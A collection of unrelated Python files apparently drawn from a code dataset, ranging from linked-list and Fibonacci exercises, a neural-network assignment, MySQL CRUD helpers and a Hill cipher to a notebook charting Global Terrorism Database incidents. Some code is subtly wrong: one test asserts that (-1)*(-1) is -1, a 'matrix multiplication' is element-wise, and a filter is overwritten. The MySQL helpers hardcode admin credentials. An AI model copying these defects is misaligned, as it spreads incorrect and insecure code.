        if count == mid:
            break
        else:
            current = current.next
            count+=1
    # even length: the mid-th node itself; odd length: one step further
    if l%2 ==0 :
        return current.data
    else:
        return current.next.data
def midPointLL2(head):
    """Return the middle node via the slow/fast pointer technique.

    For an even number of nodes this yields the first of the two middle
    nodes.  Assumes head is not None.
    """
    slow = head
    fast = head
    # fast advances two steps per slow step; when fast can no longer take
    # a double step, slow sits on the midpoint
    while fast.next is not None and fast.next.next is not None:
        fast = fast.next.next
        slow = slow.next
    return slow
# Read a space-separated list of ints; arr[:-1] drops the final value
# (presumably a terminator such as -1 -- TODO confirm input convention).
arr = list(map(int,input().split()))
head = createLL(arr[:-1])
#node = midPointLL(head)
print("using slow and fast pointer")
node = midPointLL2(head)
if node:
    print(node.data)
|
60831729f58dc649fa5cefbd16fef9264041e824 | sanathkumarbs/coding-challenges | /recursion/basic/fibonacci.py | 912 | 4.0625 | 4 | """Fibonacci.
The fibonacci sequence is a famous bit of mathematics, and it
happens to have a recursive definition. The first two values
in the sequence are 0 and 1 (essentially 2 base cases).
Each subsequent value is the sum of the previous two values,
so the whole sequence is: 0, 1, 1, 2, 3, 5, 8, 13, 21 and so on.
Define a recursive fibonacci(n) method that returns the nth
fibonacci number, with n=0 representing the start of the sequence.
fibonacci(0) > 0
fibonacci(1) > 1
fibonacci(2) > 1
fibonacci(8) > 21
http://codingbat.com/prob/p120015
"""
def fibonacci(n):
    """Return the nth Fibonacci number, where fibonacci(0) == 0 and fibonacci(1) == 1."""
    if n == 0:
        return 0
    elif n == 1:
        return 1
    else:
        # recursive definition: each value is the sum of the previous two
        return fibonacci(n - 2) + fibonacci(n - 1)
# pytest-style checks mirroring the examples in the module docstring
def test_fibonacci_one():
    assert(fibonacci(0)==0)
def test_fibonacci_two():
    assert(fibonacci(1)==1)
def test_fibonacci_three():
    assert(fibonacci(2)==1)
def test_fibonacci_four():
    assert(fibonacci(8)==21)
|
c19015df485e35d4baf9a1ef444332d7247e9dcb | narasimhareddyprostack/Ramesh-CloudDevOps | /Basics/one.py | 264 | 4.0625 | 4 | x = int(input('Pls Enter Value'))
print(x+10)
#input function read data/input at the run time
#always string only
#The input() function is used in both the version of Python 2.x and Python 3.x.
# how to read multiple values in single line
# command line args
|
544b294a3da3f61dab2e56283ab4558a3adefa43 | tkhunlertkit/cs361f18 | /Lab 4/samRationalMethods.py | 718 | 3.71875 | 4 | import unittest
from rational import Rational
class SamRationalMethods(unittest.TestCase):
    """Unit tests (authored by Sam) for the Rational class's arithmetic."""
    # Sam
    def test_zero(self):
        # zero times zero stays 0/1
        zero = Rational(0,1)
        new = zero*zero
        self.assertEqual(new.n, 0)
        self.assertEqual(new.d, 1)
    # Sam
    def test_neg(self):
        # make sure multiplying by a negative comes out correctly
        # NOTE(review): (-1/1)*(-1/1) is asserted to be -1/1 here -- confirm
        # this matches Rational's intended sign convention.
        neg = Rational(-1,1)
        mult = neg*(neg)
        self.assertEqual(mult.n, -1)
        self.assertEqual(mult.d, 1)
    # Sam
    def test_float(self):
        # float(Rational()) should be a genuine float, not an int or str
        res = Rational()
        self.assertFalse(isinstance(float(res), int))
        self.assertFalse(isinstance(float(res), str))
e2504e2954cbe80f1826e09b27e5d8b676e6b78b | wryoung412/cs224n_nlp | /assignment1/q2_neural.py | 5,910 | 3.65625 | 4 | #!/usr/bin/env python
import numpy as np
import random
from q1_softmax import softmax, softmax_grad
from q2_sigmoid import sigmoid, sigmoid_grad
from q2_gradcheck import gradcheck_naive
def forward_backward_prop(X, labels, params, dimensions, debug=False):
    """
    Forward and backward propagation for a two-layer sigmoidal network
    Compute the forward propagation and for the cross entropy cost,
    the backward propagation for the gradients for all parameters.
    Notice the gradients computed here are different from the gradients in
    the assignment sheet: they are w.r.t. weights, not inputs.
    Arguments:
    X -- M x Dx matrix, where each row is a training example x.
    labels -- M x Dy matrix, where each row is a one-hot vector.
    params -- Model parameters, these are unpacked for you.
    dimensions -- A tuple of input dimension, number of hidden units
    and output dimension
    """
    ### Unpack network parameters (do not modify)
    ofs = 0
    Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
    W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
    ofs += Dx * H
    b1 = np.reshape(params[ofs:ofs + H], (1, H))
    ofs += H
    W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
    ofs += H * Dy
    b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
    # Note: compute cost based on `sum` not `mean`.
    ### YOUR CODE HERE: forward propagation
    z1 = np.matmul(X, W1) + b1    # M x H (b1 broadcasts over rows)
    h = sigmoid(z1)
    # This is misleading. b2 is only a row vector, Broadcasting did the magic.
    # The real formula is
    # z2 = np.matmul(h, W2) + ones(n, 1) * b2
    #
    # When pretending z2 = np.matmul(h, W2) + eye(n) * b2, dim(gradb2) = M * dim(b2).
    # So gradW1 is correct, but gradb1 messed up the padding...
    z2 = np.matmul(h, W2) + b2    # M x Dy
    y = softmax(z2)
    cost = -np.sum(labels * np.log(y))
    ### END YOUR CODE
    ### YOUR CODE HERE: backward propagation
    grady = - labels / y
    gradz2 = softmax_grad(y, grady)
    # softmax_grad is tricky and requires grady.
    # When grady is from the cross entropy loss with unique labels, the gradient
    # has a scalar form.
    assert np.all(np.sum(labels, 1) == 1)
    assert np.allclose(gradz2, y - labels, rtol=1e-05, atol=1e-06)
    # Suppose z = f(y), y = g(x). Then dz/dx = dy/dx * dz/dy.
    # Notice the multiplication order.
    gradW2 = np.matmul(h.T, gradz2)
    gradb2 = np.sum(gradz2, 0)    # sum over examples collapses the broadcast
    gradh = np.matmul(gradz2, W2.T)
    gradz1 = sigmoid_grad(h) * gradh
    gradW1 = np.matmul(X.T, gradz1)
    gradb1 = np.sum(gradz1, 0)
    ### END YOUR CODE
    ### Stack gradients (do not modify)
    grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
        gradW2.flatten(), gradb2.flatten()))
    if debug:
        print('params', params.shape, params)
        print('grad', grad.shape, grad)
    return cost, grad
def forward_backward_prop_ref(data, labels, params, dimensions, debug=False):
    """
    Forward and backward propagation for a two-layer sigmoidal network
    Compute the forward propagation and for the cross entropy cost,
    and backward propagation for the gradients for all parameters.
    Arguments:
    data -- M x Dx matrix, where each row is a training example.
    labels -- M x Dy matrix, where each row is a one-hot vector.
    params -- Model parameters, these are unpacked for you.
    dimensions -- A tuple of input dimension, number of hidden units
    and output dimension
    """
    ### Unpack network parameters (do not modify)
    ofs = 0
    Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
    W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
    ofs += Dx * H
    b1 = np.reshape(params[ofs:ofs + H], (1, H))
    ofs += H
    W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
    ofs += H * Dy
    b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
    ### YOUR CODE HERE: forward propagation
    h = sigmoid(np.dot(data,W1) + b1)
    yhat = softmax(np.dot(h,W2) + b2)
    ### END YOUR CODE
    ### YOUR CODE HERE: backward propagation
    # boolean indexing picks out the predicted probability of each hot label
    cost = np.sum(-np.log(yhat[labels==1]))
    d3 = (yhat - labels)    # closed-form softmax + cross-entropy gradient
    gradW2 = np.dot(h.T, d3)
    gradb2 = np.sum(d3,0,keepdims=True)
    if debug:
        print('ref gradW2', gradW2)
    if debug:
        print('ref gradb2', gradb2)
    dh = np.dot(d3,W2.T)
    grad_h = sigmoid_grad(h) * dh
    gradW1 = np.dot(data.T,grad_h)
    gradb1 = np.sum(grad_h,0)
    ### END YOUR CODE
    ### Stack gradients (do not modify)
    grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
        gradW2.flatten(), gradb2.flatten()))
    return cost, grad
# Python 2 code (print statement, xrange) -- do not run under Python 3.
def sanity_check():
    """
    Set up fake data and parameters for the neural network, and test using
    gradcheck.
    """
    print "Running sanity check..."
    N = 20
    dimensions = [10, 5, 10]
    ## debug with small dimensions
    # N = 2
    # dimensions = [3, 1, 2]
    data = np.random.randn(N, dimensions[0]) # each row will be a datum
    labels = np.zeros((N, dimensions[2]))
    for i in xrange(N):
        labels[i, random.randint(0,dimensions[2]-1)] = 1
    # total parameter count: (Dx+1)*H weights+biases plus (H+1)*Dy
    params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (
        dimensions[1] + 1) * dimensions[2], )
    gradcheck_naive(lambda params:
        forward_backward_prop(data, labels, params, dimensions), params)
    # gradcheck_naive(lambda params, debug=False:
    #     forward_backward_prop_ref(data, labels, params, dimensions, debug), params)
def your_sanity_checks():
    """
    Use this space add any additional sanity checks by running:
    python q2_neural.py
    This function will not be called by the autograder, nor will
    your additional tests be graded.
    """
    print "Running your sanity checks..."
    ### YOUR CODE HERE
    print "No test added..."
    ### END YOUR CODE
# run the gradient checks only when executed as a script
if __name__ == "__main__":
    sanity_check()
    your_sanity_checks()
|
a41395f9a46a002d25512c614866325203a06a36 | lzchub/iPython-scripts | /mysql.py | 3,628 | 3.96875 | 4 | """
author by chuan
2020-08-04
实现数据库的连接,增删改查等操作
"""
import pymysql
"""
Insert操作
"""
def insert_sql(name,sex):
    """Insert a student row (name, sex) into tb_student; commit on success, roll back on error."""
    # 1. Create the connection object
    conn = pymysql.connect(host='192.168.100.100',
                           port=3306,
                           user='admin',
                           password='admin',
                           db='school',
                           charset='utf8')
    try:
        # Get a cursor object (closed automatically by the with-block)
        with conn.cursor() as cursor:
            # Execute the parameterized SQL; result is the affected row count
            result = cursor.execute('insert into tb_student(stuname,stusex) values(%s,%s)',(name,sex))
            if result == 1:
                print("添加成功")
            # On success, commit the transaction
            conn.commit()
    except pymysql.MySQLError as error:
        print(error)
        # On failure, roll back the transaction
        conn.rollback()
    finally:
        # Close the connection and release resources
        conn.close()
"""
delete操作
"""
def delete_sql(id):
    """Delete the tb_student row with the given stuid; commit on success, roll back on error."""
    # 1. Create the connection object
    conn = pymysql.connect(host='192.168.100.100',
                           port=3306,
                           user='admin',
                           password='admin',
                           db='school',
                           charset='utf8')
    try:
        # 2. Get a cursor object
        with conn.cursor() as cursor:
            # 3. Execute the SQL; result is the affected row count
            result = cursor.execute('delete from tb_student where stuid=%s',(id))
            if result == 1:
                print("删除成功")
            # 4. On success, commit the transaction
            conn.commit()
    except pymysql.MySQLError as error:
        print(error)
        # 5. On failure, roll back the transaction
        conn.rollback()
    finally:
        # 6. Close the connection and release resources
        conn.close()
"""
update
"""
def update_sql(id,name,sex):
    """Update the name and sex of the tb_student row with the given stuid."""
    # 1. Create the connection object
    conn = pymysql.connect(host='192.168.100.100',
                           port=3306,
                           user='admin',
                           password='admin',
                           db='school',
                           charset='utf8')
    try:
        # Get a cursor object
        with conn.cursor() as cursor:
            # Execute the SQL; result is the affected row count
            result = cursor.execute('update tb_student set stuname=%s,stusex=%s where stuid=%s',(name,sex,id))
            if result == 1:
                print("更新成功")
            # On success, commit the transaction
            conn.commit()
    except pymysql.MySQLError as error:
        print(error)
        # On failure, roll back the transaction
        conn.rollback()
    finally:
        # Close the connection and release resources
        conn.close()
"""
select操作
"""
def select_sql(id):
    """Print all tb_student rows matching the given stuid (read-only, no commit needed)."""
    # 1. Create the connection object
    conn = pymysql.connect(host='192.168.100.100',
                           port=3306,
                           user='admin',
                           password='admin',
                           db='school',
                           charset='utf8')
    try:
        # Get a cursor object
        with conn.cursor() as cursor:
            # Execute the SQL and print the full result set
            cursor.execute('select * from tb_student where stuid=%s', (id))
            print(cursor.fetchall())  # fetchone fetchmany
    except pymysql.MySQLError as error:
        print(error)
    finally:
        # Close the connection and release resources
        conn.close()
# Demo entry point: only the select is active; the write operations are kept
# commented out for manual testing.
if __name__ == '__main__':
    # insert_sql('张无忌',1)
    # delete_sql(1014)
    # update_sql(1001,'金毛丝王',1)
    select_sql(1001)
|
8cf1b746b526e1cd7d77a4cebf34f679ab9da20e | ftlka/problems | /leetcode/largest-number/solution.py | 340 | 3.515625 | 4 | from functools import cmp_to_key
def largestNumber(nums):
    """Arrange non-negative integers to form the largest number.

    Returns the result as a string; an all-zero (or empty) input
    collapses to "0".
    """
    def bigger_first(a, b):
        # a should precede b when the concatenation a+b is the larger one
        return 1 if a + b < b + a else -1

    ordered = sorted((str(num) for num in nums), key=cmp_to_key(bigger_first))
    result = ''.join(ordered)
    # Collapse redundant leading zeros (e.g. [0, 0] -> "00") to a single "0".
    # This also fixes the IndexError the original loop raised on empty input.
    return result.lstrip('0') or '0'
3770612c99a4bc1f523406526c34b65cf6da45a1 | DEEPTHA26/python | /1.py | 100 | 3.8125 | 4 | d5=int(input())
# Classify d5 (read from input above) as positive, negative, or zero.
if(d5>0):
    print("Positive")
elif(d5<0):
    print("Negative")
else:
    print("Zero")
|
48e586e2d2fa5b7a0f083ae48196de79b279574f | eli719/pyprojects | /changImageFormat.py | 1,226 | 3.5 | 4 | from PIL import Image
image = Image.open('3.jpg') # type:Image.Image
print(image)
image = image.convert('RGB')  # P->RGB
# NOTE(review): Image.save() returns None, so `image` becomes None here;
# it is rebound by the open() below, but the assignment is misleading and
# should probably be a bare image.save(...) call.
image = image.save('p_3.jpg')
image = Image.open('p_3.jpg')
print(image)
def changFormat(type):
    """Convert the module-level `image` to the given PIL mode and save it.

    Prints the (0, 0) pixel before and after conversion for comparison.
    NOTE(review): the parameter name `type` shadows the builtin.
    """
    print(image.getpixel((0, 0)))
    im = image.convert(type)
    im.save('lena_' + type + '_1.jpg')
    print(im)
    print(im.getpixel((0, 0)))
    # im.show()
# Mode "1": 1-bit bilevel image (stored as 8 bits per pixel, 0=black, 255=white).
'''
模式“1”为二值图像,非黑即白。但是它每个像素用8个bit表示,0表示黑,255表示白。下面我们将lena图像转换为“1”图像
'''
changFormat('1')
# Mode "L": 8-bit grayscale; RGB->L uses L = R*299/1000 + G*587/1000 + B*114/1000.
'''
模式“L”为灰色图像,它的每个像素用8个bit表示,0表示黑,255表示白,其他数字表示不同的灰度。在PIL中,从模式“RGB”转换为“L”模式是按照下面的公式转换的:
L = R * 299/1000 + G * 587/1000+ B * 114/1000
'''
# changFormat('L')
# Mode "P": 8-bit palette image; pixel values index into a color palette.
'''
模式“P”为8位彩色图像,它的每个像素用8个bit表示,其对应的彩色值是按照调色板查询出来的。
'''
# print(image.getpixel((0, 0)))
# image = image.convert('P')
# # image.save('lena_' + 'P' + '.png')
# print(image)
# print(image.getpixel((0, 0)))
# image.show()
# changFormat('P')
|
b6d6c7b3dd31f138f71c313d5b9396f99f240789 | TaylorWx/shiyanlou | /python/math.py | 540 | 3.984375 | 4 | #!/usr/bin/env python3
# Read two n x n integer matrices and print their element-wise product.
n = int(input("enter the value of n: "))
print("enter values for the matria A")
a = []
for i in range(n):
    a.append([int(x) for x in input().split()])
print("enter values for the Matri B")
b = []
for i in range(n):
    b.append([int(x) for x in input().split()])
# NOTE: despite the banner below, this computes the element-wise (Hadamard)
# product of A and B, not a true matrix multiplication.
c = []
for i in range(n):
    # Bug fix: the original appended a *generator* expression, which was only
    # evaluated when printed -- after the loop finished -- so every row used
    # the final value of i.  Building the row eagerly as a list is correct.
    c.append([a[i][j] * b[i][j] for j in range(n)])
print("after matrix multiplication")
print(" _"*7*n)
for x in c:
    for y in x:
        print(str(y).rjust(5), end=' ')
    print()
print("_" *7 *n)
|
2875c8c045f3e51212bd05e08602cc05bf82b305 | khoch/line-alg-python- | /main.py | 709 | 3.703125 | 4 | from display import *
from draw import *
screen = new_screen()
# Trace y = x^3 (and its x-mirrored twin) on [-1, 1], scaled onto a
# 500x500 screen centered at (250, 250), in steps of 0.016.
x = -1
x1 = 0
while (x <= 1):
    # NOTE(review): x1 starts at 0 rather than x + step, so each segment
    # joins f(x) to f(x1) a full unit ahead -- confirm this is intended.
    draw_line(screen, int(250*x)+250, int(250*x*x*x)+250, int(250*x1)+250, int(250*x1*x1*x1)+250, [255, 255, 255] )
    draw_line(screen, int(-250*x)+250, int(250*x*x*x)+250, int(-250*x1)+250, int(250*x1*x1*x1)+250, [255, 255, 255] )
    x += 0.016
    x1 += 0.016
"""
x = 0
y = 0
while (y<500):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
y += 50
while (x<500):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
x += 50
while (y>0):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
y -= 50
while (x>0):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
x -= 50
""" |
aaa239bdf7e0f21c3b6976524901b1bc6bec0199 | bmugenya/hillCypher | /encrypt.py | 1,581 | 3.8125 | 4 | class Cipher():
def __init__(self):
self.keyMatrix = [[0] * 3 for i in range(3)]
# Generate vector for the message
self.messageVector = [[0] for i in range(3)]
# Generate vector for the cipher
self.cipherMatrix = [[0] for i in range(3)]
# Following function generates the
# key matrix for the key string
def getKeyMatrix(self,key):
k = 0
for i in range(3):
for j in range(3):
self.keyMatrix[i][j] = ord(key[k]) % 65
k += 1
# Following function encrypts the message
def encrypt(self,messageVector):
for i in range(3):
for j in range(1):
self.cipherMatrix[i][j] = 0
for x in range(3):
self.cipherMatrix[i][j] += (self.keyMatrix[i][x] *
self.messageVector[x][j])
self.cipherMatrix[i][j] = self.cipherMatrix[i][j] % 26
def HillCipher(self,message, key):
# Get key matrix from the key string
self.getKeyMatrix(key)
# Generate vector for the message
for i in range(3):
self.messageVector[i][0] = ord(message[i]) % 65
# Following function generates
# the encrypted vector
self.encrypt(self.messageVector)
# Generate the encrypted text
# from the encrypted vector
CipherText = []
for i in range(3):
CipherText.append(chr(self.cipherMatrix[i][0] + 65))
# Finally print the ciphertext
return CipherText
|
05de4b1727fe44761f8ce6baf021e3d3bb0ffe54 | StevenLOL/kaggleScape | /data/script758.py | 33,841 | 3.546875 | 4 |
# coding: utf-8
# Through this notebook I will try to explore past incidents of Terrorist acts and will try to find out the reason behind these acts.<br>
# What could be the reasons behind these acts ?
#
# CAUSES AND MOTIVATIONS
# ---
# Although people resort to terrorism for a number of reasons, experts attribute most acts of violence to three major factors:<br><br>
# **Political:** People choose terrorism when they are trying to right what they perceive to be a social or political or historical wrong—when they have been stripped of their land or rights, or denied these.<br><br>
# **Religious:** Perhaps the most commonly held belief today is that terrorism is caused by religion. Though it is not the main cause of terrorism, religion does play a significant role in driving some forms of it; many terrorists act on a distorted understanding of their religion.<br><br>
# **Socioeconomic:** Various forms of deprivation can drive people to terrorism, in particular, poverty, lack of education, or lack of political freedom.
#
#
# **The World** | | **Terrorism**
# ------------- |------------- | -------------
#  |**VS** |
#
# In[ ]:
import matplotlib.pyplot as plt
import matplotlib
import plotly.plotly as py
import plotly.graph_objs as go
from plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot
init_notebook_mode(connected=True)
import seaborn as sns
import numpy as np
import pandas as pd
import numpy as np
import random as rnd
import re
import io
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.gridspec as gridspec
from sklearn.preprocessing import StandardScaler
from numpy import genfromtxt
from scipy.stats import multivariate_normal
from sklearn.metrics import f1_score
from sklearn.metrics import recall_score , average_precision_score
from sklearn.metrics import precision_score, precision_recall_curve
import string
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from wordcloud import WordCloud, STOPWORDS
get_ipython().run_line_magic('matplotlib', 'inline')
from mpl_toolkits.basemap import Basemap
from matplotlib import animation, rc
from IPython.display import HTML
import warnings
warnings.filterwarnings('ignore')
import base64
from IPython.display import HTML, display
import warnings
warnings.filterwarnings('ignore')
from scipy.misc import imread
import codecs
from subprocess import check_output
import folium
from folium import plugins
from folium.plugins import HeatMap
# Import the dataset and take a quick look
# In[ ]:
# Load the Global Terrorism Database; ISO-8859-1 because the CSV is not UTF-8.
# (terror.head(5) only renders in a notebook; its return value is discarded here.)
terror=pd.read_csv('../input/globalterrorismdb_0617dist.csv',encoding='ISO-8859-1');
terror.head(5)
# Lets first sweep through all the variables helping us draw insights on attack types , Weapon types and who are the targets.
# ---
# Attack Types
# ---
# In[ ]:
# One horizontal bar chart per attack-type column (primary/secondary/tertiary),
# stacked vertically in a 3x1 grid.
plt.figure(figsize=(8,10))
gs = gridspec.GridSpec(3, 1)
v_features = ['attacktype1_txt','attacktype2_txt','attacktype3_txt']
for i, cn in enumerate(terror[v_features]):
    ax = plt.subplot(gs[i])
    sns.barplot( y = terror[cn].value_counts().index,
                x = terror[cn].value_counts().values,
                palette="GnBu_d")
    ax.set_ylabel('')
    ax.set_title( str(cn)[0:11] )
# Weapons used
# ---
# In[ ]:
# One horizontal bar chart per weapon-type column (four columns), 4x1 grid.
plt.figure(figsize=(6,16))
gs = gridspec.GridSpec(4, 1)
v_features = ['weaptype1_txt','weaptype2_txt','weaptype3_txt','weaptype4_txt']
for i, cn in enumerate(terror[v_features]):
    ax = plt.subplot(gs[i])
    sns.barplot( y = terror[cn].value_counts().index,
                x = terror[cn].value_counts().values,
                palette="GnBu_d")
    ax.set_ylabel('')
    ax.set_title( str(cn)[0:9] )
# Who are affected?
# ---
# In[ ]:
# One horizontal bar chart per target-type column (three columns), 3x1 grid.
plt.figure(figsize=(6,16))
gs = gridspec.GridSpec(3, 1)
v_features = ['targtype1_txt','targtype2_txt','targtype3_txt']
for i, cn in enumerate(terror[v_features]):
    ax = plt.subplot(gs[i])
    sns.barplot( y = terror[cn].value_counts().index,
                x = terror[cn].value_counts().values,
                palette="GnBu_d")
    ax.set_ylabel('')
    ax.set_title( str(cn)[0:9] )
# 2 major attack types are Bombing/Explosion and Armed Assaults which indicates the misuse of science and technolgy against Humanity
# ---
# and Who has sufferred the most ?
# > Citizens :- Seeing your loved one die because of terror attack can either incite passion among the youngsters to avenge the kiling or it leads to disintegration of society<br><br>
# Lets take a look at the countries whose Citizens has seen these violent acts of terror the most
# ----
# In[ ]:
# Choropleth: incidents per country where the primary target was citizens.
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
    type = 'choropleth',
    locations = terror_filter.index,
    locationmode = 'country names',
    z = terror_filter.values,
    text = terror_filter.index,
    colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to disrupt Private Citizens & Property',
              geo = dict(showframe = False,
                        projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# India , Pakistan and Afganistan has seen thousands of terrorists act which is a worrying factor
# ----
# Terrorist Acts against Military
# ---
# In[ ]:
# Choropleth: incidents per country where the primary target was the military.
terror_filter = terror[terror['targtype1_txt'] == "Military"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
    type = 'choropleth',
    locations = terror_filter.index,
    locationmode = 'country names',
    z = terror_filter.values,
    text = terror_filter.index,
    colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to oppose their own Military',
              geo = dict(showframe = False,
                        projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# Terrorist Acts against Police
# ---
# In[ ]:
# Choropleth: incidents per country where the primary target was the police.
terror_filter = terror[terror['targtype1_txt'] == "Police"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
    type = 'choropleth',
    locations = terror_filter.index,
    locationmode = 'country names',
    z = terror_filter.values,
    text = terror_filter.index,
    colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to oppose Police',
              geo = dict(showframe = False,
                        projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# **Time Series analysis for target Types in Top 10 countries**
# ---
# > Time Series analysis for target Type:- Private Citizens & Property
# ---
# In[ ]:
# Country x year heatmap (top 10 countries by 2016 incident count) for
# attacks whose primary target was citizens.
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# > Time Series analysis for target Type:- Military
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Military"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# > Time Series analysis for target Type:- Police
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Police"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# We can see Iraq, Afghanistan and their neighbouring countries constantly topping the charts in the above 3 heatmaps
# ---
# **Folium Maps to show cities with Private Citizens & Property as a target by Terrorists**
# ---
# > click on the circle to know the name of the city and Circle radius is proportional to the no of incidents occured in that city
# 1. Top 5 Indian Cities who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "India"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[28,81], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*300,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 2. Top 5 Cities from Iraq who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Iraq"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[33,44], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*20,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 3. Top 5 Cities from Afaganistan who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Afghanistan"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[33,70], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 4. Top 5 Cities from Pakistan who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Pakistan"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
